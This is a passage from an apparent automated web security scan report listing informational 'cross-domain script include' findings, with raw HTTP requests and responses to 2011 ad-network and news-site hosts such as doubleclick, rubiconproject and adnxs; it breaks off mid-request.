GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://a1.interclick.com/getInPageJS.aspx?a=51&b=50020&cid=633862074462683028"> <\/script>
...[SNIP]...

18.10. http://finance.fox8live.com/inergize.wvue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /inergize.wvue?Module=snapshot2&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:36:57 GMT
Expires: Mon, 09 May 2011 15:37:57 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 40681

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
'head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);

var tcdacmd="dt";
document.write('<script src="http://an.tacoda.net/an/18181/slf.js"></script>
...[SNIP]...

18.11. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 09 May 2011 15:37:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5101

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.12. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-49643098_1304955489,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-49643098_1304955489%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-cm.weath_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D595286%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.weath_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Dmm.ag1%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.am1%3Bbtg%3Dmm.aq1%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYAiACKAIw-pSg7gQQ-pSg7gQYAQ..; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb976848=5_[r^kI/7Zw[-!!0nf8M`P4+Q?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP-kewMldWkJ_SsYda6b2ziV6CshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA7w4BAgUCAAUAAAAAMiaD7wAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955522%29%3Buf%28%27c%27%2C+61473%2C+1304955522%29%3Buf%28%27r%27%2C+272040%2C+1304955522%29%3Bppv%287166%2C+%279169991150143020777%27%2C+1304955522%2C+1336491522%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:38:34 GMT
Content-Length: 756

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-49643098_1304955489,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-cm.weath
...[SNIP]...
</scr'+'ipt>');document.write('<script type="text/javascript" src="http://ev.ib-ibi.com/image.sbix?go=2269&pid=32&xid=2724386019227846218"></script>
...[SNIP]...

18.13. http://login.npr.org/openid/embed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js" type="text/javascript"></script>
...[SNIP]...

18.14. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=12590^2&13549^1&5032^5; csi2=3187892.js^3^1304955417^1304955486&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:11 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:38:11 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:38:11 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^6; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58908; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3164882.js^2^1304954981^1304955491&3187892.js^3^1304955417^1304955486&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:38:11 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1460

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

18.15. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
<!-- begin ad tag-->
<script language="JavaScript" src="http://a.collective-media.net/adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

18.16. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
